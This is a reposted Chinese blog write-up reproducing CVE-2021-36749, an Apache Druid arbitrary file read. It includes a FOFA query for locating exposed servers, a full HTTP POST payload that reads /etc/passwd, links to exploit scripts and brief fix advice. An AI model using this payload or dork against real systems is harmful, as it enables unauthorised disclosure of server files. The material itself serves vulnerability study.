2. 程式人生 > 其它 >【漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞

【漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞

阿新 發佈:2021-11-18


0x00 漏洞詳情

由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTP
InputSource 來繞過應用程式級別的限制。攻擊者可利用該漏洞在未授權情況下,構造惡意請求執行檔案讀取,最終造成伺服器敏感性資訊洩露。

0x01 fofa語法

title="Apache Druid"

0x02 漏洞復現

主介面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://協議進行讀取)

file:///etc/passwd

POC:

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 413
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://127.0.0.1:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

0x03 利用指令碼

  • https://github.com/BrucessKING/CVE-2021-36749/blob/main/CVE-2021-36749.py
  • https://github.com/dorkerdevil/CVE-2021-36749/blob/main/CVE-2021-36749.py

0x04 修復方法

升級版本,設定訪問許可權

轉載請註明:Adminxe's Blog»【漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞

相關推薦

漏洞復現CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞

0x00 漏洞詳情 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTPInputSource 來繞過應用程式級別的限制。攻擊者可利用該漏洞在未授權情況下,構造惡意請求執行檔案讀取,最終造成伺

Apache Druid LoadData 任意檔案讀取漏洞-CVE-2021-36749

漏洞原理: 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTP InputSource 來繞過應用程式級別的限制。由於 Apache Druid 預設情況下是缺乏授權認證,攻擊者可利用該漏洞在未授權情況

漏洞復現CVE-2021-22205 GitLab 未授權RCE

0x00 漏洞簡介: 漏洞出來第一時間,聽漏洞澮測的朋友傳來的情報,就及時給了POC,但一直沒復現,只是簡單看了文章,提到需要可以註冊使用者才能進行攻擊,然後就感覺挺雞肋,沒有再繼續看。

CVE-2020-3452 CISCO ASA遠端任意檔案讀取漏洞

0x01 漏洞描述 Cisco官方 釋出了 Cisco ASA 軟體和 FTD 軟體的 Web 介面存在目錄遍歷導致任意檔案讀取 的風險通告,該漏洞編號為 CVE-2020-3452。 漏洞等級:中危。 通過shadon引擎的搜尋,目前全球大約有210,685個資

Apache log4j2-RCE 漏洞復現CVE-2021-44228)

Apache log4j2-RCE 漏洞復現 0x01 漏洞簡介 Apache Log4j2是一個基於Java的日誌記錄工具。由於Apache Log4j2某些功能存在遞迴解析功能,攻擊者可直接構造惡意請求,觸發遠端程式碼執行漏洞漏洞利用無需特殊配置,

Apache Log4j2 lookup JNDI 注入漏洞復現CVE-2021-44228)

今年的末尾水一篇部落格 漏洞簡介 Apache Log4j 2 是Java語言的日誌處理套件,使用極為廣泛。在其2.0到2.14.1版本中存在一處JNDI注入漏洞,攻擊者在可以控制日誌內容的情況下,通過傳入類似於${jndi:ldap://evil

Linux Polkit本地許可權提升漏洞復現CVE-2021-4034)

漏洞描述 Polkit 是用於在類 Unix 作業系統中控制系統範圍特權的元件。它為非特權程序提供了與特權程序進行通訊的有組織的方式。

S2-062_RCE漏洞復現CVE-2021-31805)

一、漏洞描述 該漏洞是由於對S2-061(CVE-2020-17530)的修復不完整,在Apache Struts 2.0.0-2.5.29版本範圍內,如果開發人員使用 %{xxx} 語法進行強制OGNL解析時,標籤的某些屬性仍然可被二次解析。當解析未經驗證的

漏洞復現-CVE-2017-12615-tomcat PUT方法任意檔案寫入漏洞

0x00 實驗環境 攻擊機:Win 10 靶場:docker拉的vulhub靶場 0x01 影響版本 版本:Tomcat 7.x版本內conf/web.xml配置檔案內預設配置無readonly引數,需要手工新增,預設配置條件下不受此漏洞影響。

Grafana 任意檔案讀取漏洞CVE-2021-43798)學習

漏洞概述 Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。

CVE-2020-10977-GITLAB CE/EE 任意檔案讀取導致遠端命令執行漏洞-環境搭建及完整復現圖文詳細筆記

漏洞環境搭建-CENTOS7 1.安裝依賴軟體 yum -y install policycoreutils openssh-server openssh-clients postfix

Grafana 任意檔案讀取漏洞CVE-2021-43798)

Preface   Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。Grafana 存在未授權任意檔案讀取漏洞,攻擊者在未經身份驗證的

Openfire Admin Console SSRF&任意檔案讀取漏洞 CVE-2019-18394 CVE-2019-18393 poc

Openfire(以前稱為Wildfire和Jive Messenger)是一個即時通訊(IM)和群聊伺服器,它使用Java編寫的XMPP伺服器,並以Apache License 2.0釋出。

mysql任意檔案讀取漏洞復現

前言 第一次得知該漏洞後找了一些文章去看。 一開始不明白這個漏洞是怎麼來的,只知道通過在服務端執行poc指令碼就可以讀取客戶端的任意檔案,直接找到網上準備好的靶機進行測試,發現可行,然後就拿別人的poc試驗,

Apache Ambari 公佈任意檔案下載漏洞

新春現金紅包與免費Linux基金會培訓&認證,等你來領!>>> 近日,Apache 官方公告了一個Apache Ambari 的任意檔案下載漏洞。Ambari的鑑權模組存在設計缺陷,惡意使用者可以繞過身份驗證,通過構

泛微雲橋e-Bridge-任意檔案讀取漏洞

1.資產查詢 Fofa: title="泛微雲橋 e-Bridge" 2.漏洞描述 泛微雲橋e-Bridge存在任意檔案讀取漏洞,攻擊者成功利用該漏洞,可實現任意檔案讀取,獲取敏感資訊。

Grafana 未授權任意檔案讀取漏洞

漏洞原理:   Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。Grafana 存在未授權任意檔案讀取漏洞,攻擊者在未經身份驗

復現CVE-2020-16898 TCP/IP遠端程式碼執行漏洞

EXP/POC看文末 簡述: CVE-2020-16898,又稱“Bad Neighbor” Windows TCP/IP堆疊不正確地處理ICMPv6 Router Advertisement資料包時,存在一個遠端執行程式碼漏洞。成功利用此漏洞的攻擊者可以獲得在目標伺服器或客戶

CVE-2021-44548 Apache Solr 敏感資訊洩露漏洞分析及復現

 前言  由於傳播、利用此文所提供的資訊而造成的任何直接或者間接的後果及損失,均由使用者本人負責,文章作者不為此承擔任何責任。

Apache Dubbo Provider預設反序列漏洞復現CVE-2020-1948)

Apache Dubbo Provider預設反序列漏洞CVE-2020-1948) 0x01 搭建漏洞環境 漏洞介紹 2020年06月23日, 360CERT監測發現Apache Dubbo 官方釋出了Apache Dubbo 遠端程式碼執行的風險通告,該漏洞編號為CVE-2020-1948,